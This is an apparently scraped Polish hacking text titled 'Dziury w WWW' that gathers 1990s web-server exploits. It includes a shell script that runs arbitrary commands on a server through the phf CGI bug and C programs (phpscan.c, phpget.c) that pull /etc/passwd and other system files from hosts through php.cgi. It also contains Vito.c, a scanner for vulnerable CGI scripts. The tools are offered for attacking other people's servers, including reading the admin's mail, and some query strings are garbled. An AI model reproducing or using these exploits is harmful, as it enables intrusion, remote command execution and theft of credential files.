• Strona Główna
• emily,
• Zadatek,

dziury w www, e-booki (Informatyka), Hacking

[ Pobierz całość w formacie PDF ]
Dyiurz w WWWDziury w WWW.1 phf - sciaganie passwd przez przegladarke : P0WERJeden ze starych sposobow:(dla lam: w miejsce xxx.xxx.xxx wpisujesz adres servera. ktory jest celemataku np free.polbox.pl)Jesli hasla beda shadowane(!, * itd w miejscu hasel) to mozna sprobowac/etc/shadow , ale male szanse, ze zadziala.Ale lepiej uzyc kilku komend:me=&Qoffice_phone=haqr&Qemail=&Qnickname=&Qoffice_phone=%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone==haqr&Qemail=&Qnickname=&Qoffice_phone=Wykonaja one cos w tym stylu:idls -la ~someusercp /etc/passwd ~someuser/passwd(normal URL access to get the passwd file)rm ~someuser/passwdW ten sposob mozna nawet probowac czytac czyjas poczte. (np admina)/...lub takA tutaj macie program, ktory sluzy go phf.-----cut here----#!/bin/sh# Coded by: AgentOrangeecho "Enter the domain you wish to try the phf bug on."read hostif [ "$host" = "*" ] ; thenexit 1fiecho "Enter the command you wish to execute"read comif [ "$com" = "*" ] ; thenexit 1fiecho "Enter the file you with to execute this command on, if any"read fileif [ "$file" = "*" ] ; thenexit 1filynx $host/cgi-bin/phf?Qname=root%0A$com%20$fileexit 0----cut here-----2 php - Nowa dziura znaleziona przez DIS (16-04-97) : P0WERJest to dziura w skrypcie cgi z httpd (PHP/FI).Pozwala ona na przegladanie plikow z servera.a oto prosty przyklad:3 phpscan.c skaner php : P0WERJest to program skanujacy servery pod katem dziury w php.phpscan domeny.txt wynik.txt----cut here---/*phpscan.c : php.cgi vunerable server scanning program.Basically a modified phf scanner, by Alhambra of The Guild.Modifications to php.cgi by so1o of The CodeZero.Usage:phpscan <infile> <outfile>*/#include <sys/stat.h>#include <sys/types.h>#include <termios.h>#include <unistd.h>#include <stdio.h>#include <fcntl.h>#include <sys/syslog.h>#include <sys/param.h>#include <sys/times.h>#ifdef LINUX#include <sys/time.h>#endif#include <unistd.h>#include <sys/socket.h>#include <netinet/in.h>#include <sys/signal.h>#include <arpa/inet.h>#include <netdb.h>int FLAG = 1;int Call(int signo){FLAG = 0;}main (int argc, char *argv[]){char host[100], buffer[1024], hosta[1024],FileBuf[8097];int outsocket, serv_len, len,X,c,outfd;struct hostent *nametocheck;struct sockaddr_in serv_addr;struct in_addr outgoing;char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";while(fgets(hosta,100,stdin)){if(hosta[0] == '\0')break;hosta[strlen(hosta) -1] = '\0';write(1,hosta,strlen(hosta)*sizeof(char));write(1,"\n",sizeof(char));outsocket = socket (AF_INET, SOCK_STREAM, 0);memset (&serv_addr, 0, sizeof (serv_addr));serv_addr.sin_family = AF_INET;nametocheck = gethostbyname (hosta);(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr));strcpy (host, inet_ntoa (outgoing));serv_addr.sin_addr.s_addr = inet_addr (host);serv_addr.sin_port = htons (80);signal(SIGALRM,Call);FLAG = 1;alarm(10);X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof(serv_addr));alarm(0);if(FLAG == 1 && X==0){write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);}close (outsocket);}return 0;}---eof---4 phpget.cJest to program, ktorym poprzez php mozesz sciagnac kilka ciekawychplikow:/etc/passwd/etc/hosts/etc/services/etc/syslogd.conf/etc/inetd.confphpget <domena> <path do pliku>phpget www.lamers.com /etc/passwd---cut here---/*p1 (peewun@heterosexual.com)This code retrieves a file using php.cgi on a remote system.This program is for educational purposes only. Use it on p1.com.*/#include <signal.h>#include <stdio.h>#include <sys/param.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>#include <stdarg.h>#include <string.h>FILE *server;int sock;void do_connect(char *host, char *toget);void do_connect(char *host, char *toget){char inbuf[1024];struct sockaddr_in sin;struct hostent *hp;char *tmpbuf;hp = gethostbyname(host);bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);sin.sin_family = hp->h_addrtype;sin.sin_port = htons(80);sock = socket(AF_INET, SOCK_STREAM, 0);if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) {printf("Made connection to %s.\n\n", host);} else {printf("Failed to connect to %s.\n\n",host);exit(0);}server=fdopen(sock, "a+");fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget);printf("Output from php.cgi request:\n\n");while(1){if (fgets(inbuf, 1024, server) == NULL)break;printf(inbuf);}}main(int argc,char **argv){printf("\nThis program retrieves files off a remote system usingphp.cgi.\n");printf("Author: p1 - peewun@heterosexual.com\n");if (argc < 3) {printf("Usage: %s <domain> <path and file>\n",argv[0]);printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]);}else {char *buffer;(char *)"exit";do_connect(argv[1],argv[2]);exit(1);}}---eof---5 Vito.c - tester dziur servera http : P0WER (tested by wienio)Jest to programi ktory laczy sie z serverem http poprzez port 80 i testujeserver pod katem wszelkich znanych dziur w http.Jest w tym phf, php i pare dziur w cgi.Spis dziur znajduje sie w pliku Vito.ini, mozna go edytowac.Vito.c---cut here---/* V.I.T.OVicious Internet TOol by ET Lownoise Colombia 1997.Copyshit (:Q~) ET 1997.Test (T.E.S.T!!!) a web server for interesting MUST NOT HAVE cgi's.note that this program sucks too.2 Files:-Vito.c-Vito.ini <---- you can edit this one....so u can upgradethis program. Just follow the sintax.etorres@cyberservices.comWhy is necesary a disclaimer when nobody reads it?.Compile for dummies===================cc -o vito vito.cExecute for dummies===================vito <host>*/#include <stdio.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>#define TAMANO 1024int sock;struct sockaddr_in sock_dest;char host_dest[100];main(int argc,char *argv[]){FILE *ini; /*check for vito.ini*/int a,b,c,d,x;struct hostent *pastelito;char buffer[TAMANO],bufrec[TAMANO],buftmp[TAMANO],encabezado[50];if (argc < 2) {fprintf(stdout,"V.I.T.O by ET Lownoise 97\n");fprintf(stdout,"Usage: %s <host> [> file]\n",argv[0]);fprintf(stdout,"Note: I know this program sucks.. it\n");fprintf(stdout," just make things easy.\n");exit(0);}if((ini=fopen("vito.ini","r"))==NULL){fprintf(stdout,"%s needs his ini file: vito.ini\n",argv[0]);exit(0);}if (sscanf(argv[1],"%d.%d.%d.%d",&a,&b,&c,&d) != 4) {pastelito = gethostbyname(argv[1]);if (pastelito == NULL) {fprintf(stdout,"Ahhhhhhh! cannot resolve host %s\n",argv[1]);exit(0);}sprintf(host_dest,"%d.%d.%d.%d",(unsigned char )pastelito->h_addr_list[0][0],(unsigned char )pastelito->h_addr_list[0][1],(unsigned char )pastelito->h_addr_list[0][2],(unsigned char )pastelito->h_addr_list[0][3]);}else {strncpy(host_dest,argv[1],99);}fprintf(stdout,"V.I.T.O.\n");fprintf(stdout,"Attac...Testing host: %s ",host_dest);/*ET*/sock_dest.sin_family = AF_INET;sock_dest.sin_port = htons(80); /* wwwport */sock_dest.sin_addr.s_addr = inet_addr(host_dest);while(fgets(buffer,TAMANO,ini)!=NULL){ /*Buffer linesize*/if(buffer[0]=='['){/* Buffer division*/strcpy(buftmp,buffer);strcpy(buffer,strchr(buftmp,'G'));strncpy(encabezado,buftmp,strlen(buftmp)-strlen(buffer)+1);encabezado[strlen(buftmp)-strlen(buffer)]='\0';sock = socket(AF_INET,SOCK_STREAM,0);if(sock < 0) {fprintf(stdout,"ERROR: socket() failed\n");exit(0);}x = connect(sock,(struct sockaddr *)&sock_dest,sizeof(sock_dest));if(x < 0){fprintf(stdout,"Upps.. can't connect to port 80\n");}fprintf(stdout,"\n|-------------------------------------------------------------|\n");fprintf(stdout," CGI: %s\n",encabezado);fprintf(stdout," Sending.\n");fprintf(stdout," %s",buffer);fprintfstdout,"|-------------------------------------------------------------|\n");send(sock,buffer,TAMANO*sizeof(char),0);bzero(buffer,TAMANO);fprintf(stdout," Receiving.\n\n");while((x=recv(sock,bufrec,TAMANO*sizeof(char),0))!=0){fprintf(stdout,"%s",bufrec);bzero(bufrec,TAMANO);}close(sock);}}fclose(ini);fprintf(stdout,"\n|=============================================================|\n"); ... [ Pobierz całość w formacie PDF ]